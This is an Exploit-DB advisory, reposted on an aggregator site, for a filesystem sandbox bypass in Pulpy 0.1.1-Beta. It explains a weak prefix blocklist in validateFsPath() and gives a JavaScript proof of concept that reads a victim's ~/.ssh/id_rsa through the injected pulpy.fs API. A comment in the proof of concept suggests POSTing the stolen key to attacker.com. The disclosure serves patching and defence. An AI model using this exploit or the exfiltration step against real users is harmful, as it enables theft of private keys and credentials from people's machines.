[webapps] Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sa 2026-7-6 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏

# Exploit Title: Pulpy 0.1.1-Beta - Filesystem Sandbox Bypass
# Google Dork: N/A
# Date: 2026-06-19
# Exploit Author: Onur BILICI @basekill
# Vendor Homepage: https://github.com/enesgkky/pulpy
# Software Link: https://github.com/enesgkky/pulpy
# Version: <= 0.1.1-Beta
# Tested on: macOS, Linux
# CVE: CVE-2026-44225

Description:
  Pulpy injects a 'pulpy.fs' JavaScript API into every packaged web application, 
  granting it access to the host filesystem. A 'validateFsPath()' function is 
  implemented to sandbox this access using a blocklist. However, this blocklist 
  is incomplete. 
  
  The implementation only catches root-level paths (e.g., matching "/Library/" 
  at index 0), meaning it completely misses user-specific paths such as 
  "/Users/<username>/Library/" or critical configuration directories like 
  "~/.ssh/", "~/.aws/", and "~/Documents/". 
  
  As a result, any malicious web application packaged with Pulpy can bypass the 
  sandbox to read and write arbitrary sensitive files in the user's home directory.

Root Cause Analysis:
  In 'src/bridge/native_modules.mm', the path validation logic relies on a weak 
  prefix check:
  
  std::string normalized = fs::weakly_canonical(p).string();
  if (normalized.find("/etc/") == 0 ||
      normalized.find("/var/") == 0 ||
      normalized.find("/usr/") == 0 ||
      normalized.find("/System/") == 0 ||
      normalized.find("/Library/") == 0) {
      return "";
  }
  return normalized;

Proof of Concept (PoC):
  An attacker can execute the following JavaScript code within a Pulpy-packaged 
  application to exfiltrate sensitive user data:

  ```javascript
  // Bypassing the sandbox to read sensitive files from the user's home directory
  try {
      // Example target: SSH private key
      // Note: You need to replace '<username>' with the target's actual username or dynamically resolve it
      const sshKeyPath = "/Users/<username>/.ssh/id_rsa"; 
      
      pulpy.fs.readFile(sshKeyPath, 'utf8', (err, data) => {
          if (err) {
              console.error("Failed to read file:", err);
              return;
          }
          console.log("Successfully bypassed sandbox! Content:\n", data);
          
          // Exfiltration logic can be placed here (e.g., fetch('[https://attacker.com/log](https://attacker.com/log)', {method: 'POST', body: data}))
      });
  } catch (e) {
      console.error("Exploit failed:", e);
  }
            

文章来源: https://www.exploit-db.com/exploits/52616
如有侵权请联系:admin#unsafe.sh